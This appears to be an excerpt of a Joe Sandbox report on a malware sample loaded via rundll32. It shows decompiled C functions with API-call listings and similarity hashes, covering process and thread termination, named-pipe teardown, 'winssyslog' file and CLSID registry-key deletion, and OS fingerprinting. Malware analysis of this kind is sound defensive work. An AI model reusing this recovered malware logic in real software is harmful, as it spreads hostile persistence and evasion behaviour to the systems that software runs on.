                                                                                              Similarity
                                                                                              • API ID: Process$AddressLibraryLoadMemoryProcRead$CurrentHandleModuleOpen
                                                                                              • String ID: IsWow64Process$NtQueryInformationProcess$kernel32.dll$ntdll.dll
                                                                                              • API String ID: 4184825023-3205649337
                                                                                              • Opcode ID: 00d00e4d6fc7afeab15ace1bc3656b0a678460628ca51800e41cd1856780fc23
                                                                                              • Instruction ID: c549ca459589e0cd8cac0a83507ead0549dcc67b8aec80ea37b14ff72f9d904a
                                                                                              • Opcode Fuzzy Hash: 00d00e4d6fc7afeab15ace1bc3656b0a678460628ca51800e41cd1856780fc23
                                                                                              • Instruction Fuzzy Hash: C951B471B202196BDB14AB74EC49BBEB7B8FF44304F404169E909E7190DF74AD44CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E04263E90(intOrPtr* __ecx) {
                                                                                              				void* _t24;
                                                                                              				void* _t25;
                                                                                              				void* _t26;
                                                                                              				void* _t27;
                                                                                              				int _t36;
                                                                                              				intOrPtr* _t42;
                                                                                              
                                                                                              				_t42 = __ecx;
                                                                                              				 *__ecx = 0x429eda4;
                                                                                              				TerminateThread( *(__ecx + 0x24), 0);
                                                                                              				TerminateProcess( *(_t42 + 0x1c), 0);
                                                                                              				TerminateThread( *(_t42 + 0x20), 0);
                                                                                              				WaitForSingleObject( *(_t42 + 0x28), 0x7d0);
                                                                                              				TerminateThread( *(_t42 + 0x28), 0);
                                                                                              				_t24 =  *(_t42 + 0xc);
                                                                                              				if(_t24 != 0) {
                                                                                              					DisconnectNamedPipe(_t24);
                                                                                              				}
                                                                                              				_t25 =  *(_t42 + 0x10);
                                                                                              				if(_t25 != 0) {
                                                                                              					DisconnectNamedPipe(_t25);
                                                                                              				}
                                                                                              				_t26 =  *(_t42 + 0x14);
                                                                                              				if(_t26 != 0) {
                                                                                              					DisconnectNamedPipe(_t26);
                                                                                              				}
                                                                                              				_t27 =  *(_t42 + 0x18);
                                                                                              				if(_t27 != 0) {
                                                                                              					DisconnectNamedPipe(_t27);
                                                                                              				}
                                                                                              				CloseHandle( *(_t42 + 0xc));
                                                                                              				CloseHandle( *(_t42 + 0x10));
                                                                                              				CloseHandle( *(_t42 + 0x14));
                                                                                              				CloseHandle( *(_t42 + 0x18));
                                                                                              				CloseHandle( *(_t42 + 0x1c));
                                                                                              				CloseHandle( *(_t42 + 0x20));
                                                                                              				CloseHandle( *(_t42 + 0x28));
                                                                                              				CloseHandle( *(_t42 + 0x24));
                                                                                              				 *_t42 = 0x429e8b0;
                                                                                              				_t36 = CloseHandle( *(_t42 + 8));
                                                                                              				 *_t42 = 0x429e8c0;
                                                                                              				return _t36;
                                                                                              			}









                                                                                              0x04263e98
                                                                                              0x04263e9f
                                                                                              0x04263ea5
                                                                                              0x04263eac
                                                                                              0x04263eb7
                                                                                              0x04263ec1
                                                                                              0x04263ecc
                                                                                              0x04263ece
                                                                                              0x04263ed9
                                                                                              0x04263edc
                                                                                              0x04263edc
                                                                                              0x04263ede
                                                                                              0x04263ee3
                                                                                              0x04263ee6
                                                                                              0x04263ee6
                                                                                              0x04263ee8
                                                                                              0x04263eed
                                                                                              0x04263ef0
                                                                                              0x04263ef0
                                                                                              0x04263ef2
                                                                                              0x04263ef7
                                                                                              0x04263efa
                                                                                              0x04263efa
                                                                                              0x04263f05
                                                                                              0x04263f0a
                                                                                              0x04263f0f
                                                                                              0x04263f14
                                                                                              0x04263f19
                                                                                              0x04263f1e
                                                                                              0x04263f23
                                                                                              0x04263f28
                                                                                              0x04263f2d
                                                                                              0x04263f33
                                                                                              0x04263f35
                                                                                              0x04263f3d

                                                                                              APIs
                                                                                              • TerminateThread.KERNEL32(?,00000000,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263EA5
                                                                                              • TerminateProcess.KERNEL32(?,00000000,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263EAC
                                                                                              • TerminateThread.KERNEL32(?,00000000,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263EB7
                                                                                              • WaitForSingleObject.KERNEL32(?,000007D0,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263EC1
                                                                                              • TerminateThread.KERNEL32(?,00000000,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263ECC
                                                                                              • DisconnectNamedPipe.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263EDC
                                                                                              • DisconnectNamedPipe.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263EE6
                                                                                              • DisconnectNamedPipe.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263EF0
                                                                                              • DisconnectNamedPipe.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263EFA
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263F05
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263F0A
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263F0F
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263F14
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263F19
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263F1E
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263F23
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263F28
                                                                                              • CloseHandle.KERNEL32(?,?,00000000,042590F8,?,042A78D8,00000000), ref: 04263F33
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: CloseHandle$DisconnectNamedPipeTerminate$Thread$ObjectProcessSingleWait
                                                                                              • String ID:
                                                                                              • API String ID: 1450516946-0
                                                                                              • Opcode ID: ec460bf9fac098d1ec2ac76276a9463ba5e4c80845e1af42178649241ced0d04
                                                                                              • Instruction ID: 92f03eb35b2cec3955c34bf20d08b85c71d1057794c8494a2bc7f32d4fe85ea9
                                                                                              • Opcode Fuzzy Hash: ec460bf9fac098d1ec2ac76276a9463ba5e4c80845e1af42178649241ced0d04
                                                                                              • Instruction Fuzzy Hash: 1F11CC31B1062ABBDB11AF76DC08B06BFB9FF08760B154112A408929A0CB71FCA1DED4
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 89%
                                                                                              			E0425A830(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				char _v88;
                                                                                              				short _v608;
                                                                                              				short _v1128;
                                                                                              				void* _v1132;
                                                                                              				signed int _t22;
                                                                                              				void* _t50;
                                                                                              				signed int _t64;
                                                                                              				void* _t69;
                                                                                              
                                                                                              				_t69 = __eflags;
                                                                                              				_t63 = __esi;
                                                                                              				_t62 = __edi;
                                                                                              				_t22 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t22 ^ _t64;
                                                                                              				_t50 = __ecx;
                                                                                              				_push(0);
                                                                                              				E04266370(__ecx, L"winssyslog",  &_v608, __edi, __esi, 8);
                                                                                              				DeleteFileW( &_v608);
                                                                                              				E042578B0(_t50, L"Control", 0x1fffffff, __edi, __esi, _t69);
                                                                                              				E04266050(_t50, L"Global",  &_v88, __edi, __esi);
                                                                                              				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				_v1132 = 0;
                                                                                              				if(RegOpenKeyExW(0x80000002,  &_v608, 0, 0x20106,  &_v1132) == 0) {
                                                                                              					SHDeleteKeyW(_v1132, 0x429c5d0);
                                                                                              					RegCloseKey(_v1132);
                                                                                              				}
                                                                                              				E04266050(_t50, L"Pg",  &_v88, _t62, _t63);
                                                                                              				wsprintfW( &_v1128, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                                                              				_v1132 = 0;
                                                                                              				if(RegOpenKeyExW(0x80000002,  &_v1128, 0, 0x20106,  &_v1132) == 0) {
                                                                                              					SHDeleteKeyW(_v1132, 0x429c5d0);
                                                                                              					RegCloseKey(_v1132);
                                                                                              				}
                                                                                              				CreateEventA(0, 1, 0, _t50 + 0xc);
                                                                                              				return E04275AFE(_v8 ^ _t64);
                                                                                              			}












                                                                                              0x0425a830
                                                                                              0x0425a830
                                                                                              0x0425a830
                                                                                              0x0425a839
                                                                                              0x0425a840
                                                                                              0x0425a844
                                                                                              0x0425a84c
                                                                                              0x0425a855
                                                                                              0x0425a864
                                                                                              0x0425a874
                                                                                              0x0425a881
                                                                                              0x0425a896
                                                                                              0x0425a89f
                                                                                              0x0425a8cb
                                                                                              0x0425a8d8
                                                                                              0x0425a8e4
                                                                                              0x0425a8e4
                                                                                              0x0425a8f2
                                                                                              0x0425a907
                                                                                              0x0425a910
                                                                                              0x0425a93c
                                                                                              0x0425a949
                                                                                              0x0425a955
                                                                                              0x0425a955
                                                                                              0x0425a965
                                                                                              0x0425a979

                                                                                              APIs
                                                                                                • Part of subcall function 04266370: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 04266396
                                                                                              • DeleteFileW.KERNEL32(?), ref: 0425A864
                                                                                                • Part of subcall function 042578B0: wsprintfW.USER32 ref: 042578DF
                                                                                                • Part of subcall function 042578B0: RegCreateKeyExW.ADVAPI32(80000002,?,00000000,00000000,00000000,000F013F,00000000,?,00000000), ref: 04257919
                                                                                                • Part of subcall function 042578B0: RegSetValueExW.ADVAPI32(?,0429E09C,00000000,00000004,?,00000004), ref: 0425793A
                                                                                                • Part of subcall function 042578B0: RegCloseKey.ADVAPI32(?), ref: 04257950
                                                                                                • Part of subcall function 04266050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 042661F1
                                                                                                • Part of subcall function 04266050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0426621F
                                                                                                • Part of subcall function 04266050: RegCloseKey.ADVAPI32(?), ref: 04266235
                                                                                              • wsprintfW.USER32 ref: 0425A896
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 0425A8C3
                                                                                              • SHDeleteKeyW.SHLWAPI(00000000,0429C5D0), ref: 0425A8D8
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0425A8E4
                                                                                              • wsprintfW.USER32 ref: 0425A907
                                                                                              • RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020106,00000000), ref: 0425A934
                                                                                              • SHDeleteKeyW.SHLWAPI(00000000,0429C5D0), ref: 0425A949
                                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 0425A955
                                                                                              • CreateEventA.KERNEL32(00000000,00000001,00000000,?), ref: 0425A965
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Close$DeleteOpenwsprintf$CreateValue$DirectoryEventFileQuerySystem
                                                                                              • String ID: Control$Global$SOFTWARE\Classes\CLSID\%s$winssyslog
                                                                                              • API String ID: 164381605-1386177884
                                                                                              • Opcode ID: ec6ea930465dc4eac1a199b8decb046f5e7f594a90b80d46a1a71fb9515b5144
                                                                                              • Instruction ID: 36ce9b874e63e904f8698c1b79d6d1fbe0ed829838da6526be74c58f727b6ab9
                                                                                              • Opcode Fuzzy Hash: ec6ea930465dc4eac1a199b8decb046f5e7f594a90b80d46a1a71fb9515b5144
                                                                                              • Instruction Fuzzy Hash: A031C671B10218BBEF20EB94ED49F99737CEB44705F1001A8E605E6181EE756E49CF65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 92%
                                                                                              			E04275860(LONG* __ecx, signed int __edx, long _a4) {
                                                                                              				long _v8;
                                                                                              				signed int _v12;
                                                                                              				void* _v16;
                                                                                              				long _t38;
                                                                                              				long _t52;
                                                                                              				unsigned int _t64;
                                                                                              				void* _t67;
                                                                                              				void* _t68;
                                                                                              				void** _t71;
                                                                                              				void* _t72;
                                                                                              				void** _t75;
                                                                                              				void* _t76;
                                                                                              				long _t82;
                                                                                              				LONG* _t88;
                                                                                              				void* _t89;
                                                                                              
                                                                                              				_v12 = __edx;
                                                                                              				_t88 = __ecx;
                                                                                              				if(_a4 == 0) {
                                                                                              					if(__ecx[1] == 0) {
                                                                                              						L24:
                                                                                              						return _t38;
                                                                                              					}
                                                                                              					_t64 = 0xaaaaaaab * __edx >> 0x20 >> 1;
                                                                                              					if(_t64 >= 0x3a98) {
                                                                                              						_t64 = 0x3a98;
                                                                                              					} else {
                                                                                              						if(_t64 <= 0x3e8) {
                                                                                              							_t64 = 0x3e8;
                                                                                              						}
                                                                                              					}
                                                                                              					_t38 =  <  ? 0x7fffffff : timeGetTime() - _t88[4];
                                                                                              					if(_t38 < _t64) {
                                                                                              						goto L24;
                                                                                              					} else {
                                                                                              						_t82 = 0;
                                                                                              						_a4 = 1;
                                                                                              						_v8 = 0;
                                                                                              						_t38 = InterlockedCompareExchange(_t88, 1, 0);
                                                                                              						asm("sbb ebx, ebx");
                                                                                              						_t67 =  ~_t38 + 1;
                                                                                              						if(_t67 == 0) {
                                                                                              							goto L24;
                                                                                              						}
                                                                                              						L12:
                                                                                              						L12:
                                                                                              						if(_a4 != 0) {
                                                                                              							_a4 = 0;
                                                                                              							_t52 = timeGetTime();
                                                                                              							_t82 = _t52;
                                                                                              							_v8 = _t82;
                                                                                              							if(_t82 == 0) {
                                                                                              								_t52 = timeGetTime();
                                                                                              							}
                                                                                              							_t88[4] = _t52;
                                                                                              						}
                                                                                              						_t38 = _t88[2];
                                                                                              						_t75 =  *(_t38 + 4);
                                                                                              						if(_t75 == 0) {
                                                                                              							goto L22;
                                                                                              						}
                                                                                              						_t76 =  *_t75;
                                                                                              						_v16 = _t76;
                                                                                              						_t38 = _t82 -  *((intOrPtr*)(_t76 + 0x34));
                                                                                              						if(_t38 < _v12) {
                                                                                              							goto L22;
                                                                                              						}
                                                                                              						_t88[2] =  *(_t88[2] + 4);
                                                                                              						InterlockedDecrement( &(_t88[1]));
                                                                                              						_push(8);
                                                                                              						E04275B47(_t88[2]);
                                                                                              						_t89 = _t89 + 8;
                                                                                              						if(_t67 != 0) {
                                                                                              							 *_t88 = 0;
                                                                                              						}
                                                                                              						_t68 = _v16;
                                                                                              						E042753C0(_t68 + 0x8c);
                                                                                              						DeleteCriticalSection(_t68 + 0x6c);
                                                                                              						DeleteCriticalSection(_t68 + 0x54);
                                                                                              						HeapFree( *( *_t68), 0, _t68);
                                                                                              						_t38 = InterlockedCompareExchange(_t88, 1, 0);
                                                                                              						asm("sbb ebx, ebx");
                                                                                              						_t67 =  ~_t38 + 1;
                                                                                              						if(_t67 == 0) {
                                                                                              							goto L24;
                                                                                              						} else {
                                                                                              							_t82 = _v8;
                                                                                              							goto L12;
                                                                                              						}
                                                                                              						L22:
                                                                                              						if(_t67 == 0) {
                                                                                              							goto L24;
                                                                                              						}
                                                                                              						L23:
                                                                                              						 *_t88 = 0;
                                                                                              						return _t38;
                                                                                              					}
                                                                                              				}
                                                                                              				if(InterlockedCompareExchange(__ecx, 1, 0) == 0) {
                                                                                              					while(1) {
                                                                                              						L3:
                                                                                              						_t38 = _t88[2];
                                                                                              						_t71 =  *(_t38 + 4);
                                                                                              						if(_t71 == 0) {
                                                                                              							goto L23;
                                                                                              						}
                                                                                              						_t72 =  *_t71;
                                                                                              						_t88[2] =  *(_t88[2] + 4);
                                                                                              						InterlockedDecrement( &(_t88[1]));
                                                                                              						_push(8);
                                                                                              						E04275B47(_t88[2]);
                                                                                              						_t89 = _t89 + 8;
                                                                                              						E042753C0(_t72 + 0x8c);
                                                                                              						DeleteCriticalSection(_t72 + 0x6c);
                                                                                              						DeleteCriticalSection(_t72 + 0x54);
                                                                                              						HeapFree( *( *_t72), 0, _t72);
                                                                                              					}
                                                                                              					goto L23;
                                                                                              				} else {
                                                                                              					goto L2;
                                                                                              				}
                                                                                              				do {
                                                                                              					L2:
                                                                                              					asm("pause");
                                                                                              				} while (InterlockedCompareExchange(_t88, 1, 0) != 0);
                                                                                              				goto L3;
                                                                                              			}


















                                                                                              0x0427586d
                                                                                              0x04275870
                                                                                              0x04275872
                                                                                              0x042758f2
                                                                                              0x04275a2b
                                                                                              0x04275a2b
                                                                                              0x04275a2b
                                                                                              0x04275901
                                                                                              0x04275909
                                                                                              0x0427591a
                                                                                              0x0427590b
                                                                                              0x04275911
                                                                                              0x04275913
                                                                                              0x04275913
                                                                                              0x04275911
                                                                                              0x04275934
                                                                                              0x04275939
                                                                                              0x00000000
                                                                                              0x0427593f
                                                                                              0x0427593f
                                                                                              0x04275941
                                                                                              0x0427594c
                                                                                              0x0427594f
                                                                                              0x04275959
                                                                                              0x0427595b
                                                                                              0x0427595e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04275964
                                                                                              0x04275968
                                                                                              0x0427596a
                                                                                              0x04275971
                                                                                              0x04275977
                                                                                              0x04275979
                                                                                              0x0427597e
                                                                                              0x04275980
                                                                                              0x04275980
                                                                                              0x04275986
                                                                                              0x04275986
                                                                                              0x04275989
                                                                                              0x0427598c
                                                                                              0x04275991
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04275997
                                                                                              0x0427599b
                                                                                              0x0427599e
                                                                                              0x042759a4
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042759ac
                                                                                              0x042759b3
                                                                                              0x042759b9
                                                                                              0x042759bc
                                                                                              0x042759c1
                                                                                              0x042759c6
                                                                                              0x042759c8
                                                                                              0x042759c8
                                                                                              0x042759ce
                                                                                              0x042759d9
                                                                                              0x042759e2
                                                                                              0x042759ec
                                                                                              0x042759f7
                                                                                              0x04275a02
                                                                                              0x04275a0c
                                                                                              0x04275a0e
                                                                                              0x04275a11
                                                                                              0x00000000
                                                                                              0x04275a13
                                                                                              0x04275a13
                                                                                              0x00000000
                                                                                              0x04275a13
                                                                                              0x04275a1b
                                                                                              0x04275a1d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04275a1f
                                                                                              0x04275a1f
                                                                                              0x00000000
                                                                                              0x04275a1f
                                                                                              0x04275939
                                                                                              0x04275883
                                                                                              0x04275892
                                                                                              0x04275892
                                                                                              0x04275892
                                                                                              0x04275895
                                                                                              0x0427589a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042758a3
                                                                                              0x042758a8
                                                                                              0x042758af
                                                                                              0x042758b5
                                                                                              0x042758b8
                                                                                              0x042758c5
                                                                                              0x042758c8
                                                                                              0x042758d1
                                                                                              0x042758db
                                                                                              0x042758e6
                                                                                              0x042758e6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04275885
                                                                                              0x04275885
                                                                                              0x04275885
                                                                                              0x0427588e
                                                                                              0x00000000

                                                                                              APIs
                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0427587F
                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0427588C
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 042758AF
                                                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 042758D1
                                                                                              • RtlDeleteCriticalSection.NTDLL(00000000), ref: 042758DB
                                                                                              • HeapFree.KERNEL32(?,00000000,?), ref: 042758E6
                                                                                              • timeGetTime.WINMM ref: 04275922
                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 0427594F
                                                                                              • timeGetTime.WINMM ref: 04275971
                                                                                              • timeGetTime.WINMM ref: 04275980
                                                                                              • InterlockedDecrement.KERNEL32(00000000), ref: 042759B3
                                                                                              • RtlDeleteCriticalSection.NTDLL(?), ref: 042759E2
                                                                                              • RtlDeleteCriticalSection.NTDLL(00000000), ref: 042759EC
                                                                                              • HeapFree.KERNEL32(?,00000000,?), ref: 042759F7
                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000001,00000000), ref: 04275A02
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Interlocked$CompareCriticalDeleteExchangeSection$Timetime$DecrementFreeHeap
                                                                                              • String ID:
                                                                                              • API String ID: 517897276-0
                                                                                              • Opcode ID: eed67e272c9dd2a381c2e42ba1c7912292cca9788ae2cbd158a612d10ecdfb1d
                                                                                              • Instruction ID: 3ebb66f9959b778374a36c226e8cf4ec44469cc7a81a2b48cb03c3a607cd8b6a
                                                                                              • Opcode Fuzzy Hash: eed67e272c9dd2a381c2e42ba1c7912292cca9788ae2cbd158a612d10ecdfb1d
                                                                                              • Instruction Fuzzy Hash: 92517031720306FBDB209FA8D8C8B59B7B8FF44311F148429EA459B690DB78BD86CB50
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 68%
                                                                                              			E04265A50(intOrPtr* __ecx, void* __edi, void* __esi) {
                                                                                              				signed int _v8;
                                                                                              				char _v18;
                                                                                              				struct _OSVERSIONINFOW _v300;
                                                                                              				signed int _v304;
                                                                                              				char _v308;
                                                                                              				char _v312;
                                                                                              				intOrPtr _v316;
                                                                                              				char _v348;
                                                                                              				signed int _t45;
                                                                                              				_Unknown_base(*)()* _t49;
                                                                                              				intOrPtr _t50;
                                                                                              				intOrPtr _t57;
                                                                                              				_Unknown_base(*)()* _t61;
                                                                                              				intOrPtr _t65;
                                                                                              				signed int _t73;
                                                                                              				intOrPtr _t76;
                                                                                              				intOrPtr _t86;
                                                                                              				intOrPtr _t89;
                                                                                              				signed short* _t90;
                                                                                              				intOrPtr _t93;
                                                                                              				void* _t95;
                                                                                              				void* _t97;
                                                                                              				signed int _t98;
                                                                                              				intOrPtr* _t100;
                                                                                              				signed int _t101;
                                                                                              				void* _t118;
                                                                                              
                                                                                              				_t45 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t45 ^ _t101;
                                                                                              				_t100 = __ecx;
                                                                                              				E0427DEA0(__edi, __ecx, 0, 0x120);
                                                                                              				_t97 = LoadLibraryA;
                                                                                              				_t49 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetNativeSystemInfo");
                                                                                              				if(_t49 == 0) {
                                                                                              					L4:
                                                                                              					_t50 = 0;
                                                                                              				} else {
                                                                                              					asm("xorps xmm0, xmm0");
                                                                                              					_v316 = 0;
                                                                                              					asm("movups [ebp-0x158], xmm0");
                                                                                              					asm("movups [ebp-0x148], xmm0");
                                                                                              					 *_t49( &_v348);
                                                                                              					_t76 = _v348;
                                                                                              					if(_t76 == 6 || _t76 == 9) {
                                                                                              						_t50 = 1;
                                                                                              					} else {
                                                                                              						goto L4;
                                                                                              					}
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_t100 + 0x10)) = _t50;
                                                                                              				 *((intOrPtr*)(_t100 + 0x14)) = E042659C0(GetCurrentProcess());
                                                                                              				E0427DEA0(_t97,  &_v300, 0, 0x11c);
                                                                                              				_v300.dwOSVersionInfoSize = 0x11c;
                                                                                              				if(GetVersionExW( &_v300) != 0) {
                                                                                              					_t89 = _v300.dwMajorVersion;
                                                                                              					_t93 = _v300.dwMinorVersion;
                                                                                              					 *(_t100 + 8) = _v300.dwBuildNumber;
                                                                                              					 *((intOrPtr*)(_t100 + 0xc)) = _v300.dwPlatformId;
                                                                                              					 *_t100 = _t89;
                                                                                              					 *((intOrPtr*)(_t100 + 4)) = _t93;
                                                                                              					 *(_t100 + 0x1c) = 0 | _v18 != 0x00000001;
                                                                                              					if(_t89 == 5 && _t93 == 2) {
                                                                                              						 *((intOrPtr*)(_t100 + 0x18)) = GetSystemMetrics(0x59);
                                                                                              					}
                                                                                              					_t90 =  &(_v300.szCSDVersion);
                                                                                              					_t23 = _t100 + 0x20; // 0x20
                                                                                              					_t95 = _t23 - _t90;
                                                                                              					do {
                                                                                              						_t73 =  *_t90 & 0x0000ffff;
                                                                                              						_t90 =  &(_t90[1]);
                                                                                              						 *(_t95 + _t90 - 2) = _t73;
                                                                                              					} while (_t73 != 0);
                                                                                              				}
                                                                                              				_t57 =  *_t100;
                                                                                              				if(_t57 != 6 ||  *((intOrPtr*)(_t100 + 4)) != 2) {
                                                                                              					if(_t57 != 0) {
                                                                                              						goto L21;
                                                                                              					} else {
                                                                                              						goto L14;
                                                                                              					}
                                                                                              				} else {
                                                                                              					L14:
                                                                                              					_t61 = GetProcAddress(LoadLibraryA("ntdll.dll"), "RtlGetNtVersionNumbers");
                                                                                              					if(_t61 == 0) {
                                                                                              						return E04275AFE(_v8 ^ _t101);
                                                                                              					} else {
                                                                                              						 *_t61( &_v308,  &_v312,  &_v304);
                                                                                              						_t98 = _v304 & 0x0000ffff;
                                                                                              						_t92 =  *_t100;
                                                                                              						_t65 = _v308;
                                                                                              						_t86 = _v312;
                                                                                              						_v304 = _t98;
                                                                                              						_t118 = _t65 -  *_t100;
                                                                                              						if(_t118 > 0 || _t118 == 0 && _t86 >  *((intOrPtr*)(_t100 + 4))) {
                                                                                              							 *_t100 = _t65;
                                                                                              							 *((intOrPtr*)(_t100 + 4)) = _t86;
                                                                                              							 *(_t100 + 8) = _t98;
                                                                                              							 *(_t100 + 0x1c) = 0 | E042658B0(_t92, _t98) != 0x00000000;
                                                                                              							if( *_t100 == 5 &&  *((intOrPtr*)(_t100 + 4)) == 2) {
                                                                                              								 *((intOrPtr*)(_t100 + 0x18)) = GetSystemMetrics(0x59);
                                                                                              							}
                                                                                              						}
                                                                                              						L21:
                                                                                              						return E04275AFE(_v8 ^ _t101);
                                                                                              					}
                                                                                              				}
                                                                                              			}





























                                                                                              0x04265a59
                                                                                              0x04265a60
                                                                                              0x04265a6a
                                                                                              0x04265a6f
                                                                                              0x04265a74
                                                                                              0x04265a8a
                                                                                              0x04265a92
                                                                                              0x04265ad1
                                                                                              0x04265ad1
                                                                                              0x04265a94
                                                                                              0x04265a94
                                                                                              0x04265a97
                                                                                              0x04265aa8
                                                                                              0x04265aaf
                                                                                              0x04265ab6
                                                                                              0x04265ab8
                                                                                              0x04265ac2
                                                                                              0x04265aca
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04265ac2
                                                                                              0x04265ad3
                                                                                              0x04265ae8
                                                                                              0x04265af4
                                                                                              0x04265afc
                                                                                              0x04265b15
                                                                                              0x04265b1d
                                                                                              0x04265b23
                                                                                              0x04265b29
                                                                                              0x04265b32
                                                                                              0x04265b3b
                                                                                              0x04265b40
                                                                                              0x04265b43
                                                                                              0x04265b49
                                                                                              0x04265b58
                                                                                              0x04265b58
                                                                                              0x04265b5b
                                                                                              0x04265b61
                                                                                              0x04265b66
                                                                                              0x04265b70
                                                                                              0x04265b70
                                                                                              0x04265b73
                                                                                              0x04265b76
                                                                                              0x04265b7b
                                                                                              0x04265b70
                                                                                              0x04265b80
                                                                                              0x04265b85
                                                                                              0x04265b8f
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04265b95
                                                                                              0x04265b95
                                                                                              0x04265ba2
                                                                                              0x04265baa
                                                                                              0x04265c3c
                                                                                              0x04265bac
                                                                                              0x04265bc1
                                                                                              0x04265bc3
                                                                                              0x04265bca
                                                                                              0x04265bcc
                                                                                              0x04265bd2
                                                                                              0x04265bd8
                                                                                              0x04265bde
                                                                                              0x04265be0
                                                                                              0x04265be9
                                                                                              0x04265beb
                                                                                              0x04265bee
                                                                                              0x04265c00
                                                                                              0x04265c03
                                                                                              0x04265c13
                                                                                              0x04265c13
                                                                                              0x04265c03
                                                                                              0x04265c16
                                                                                              0x04265c2a
                                                                                              0x04265c2a
                                                                                              0x04265baa

                                                                                              APIs
                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,GetNativeSystemInfo,?,?,00000000), ref: 04265A87
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04265A8A
                                                                                              • GetCurrentProcess.KERNEL32(?,?,00000000), ref: 04265AD6
                                                                                              • GetVersionExW.KERNEL32(0000011C,?,?,?,?,?,00000000), ref: 04265B0D
                                                                                              • GetSystemMetrics.USER32(00000059), ref: 04265B52
                                                                                              • LoadLibraryA.KERNEL32(ntdll.dll,RtlGetNtVersionNumbers,?,?,?,?,?,00000000), ref: 04265B9F
                                                                                              • GetProcAddress.KERNEL32(00000000), ref: 04265BA2
                                                                                              • GetSystemMetrics.USER32(00000059), ref: 04265C0D
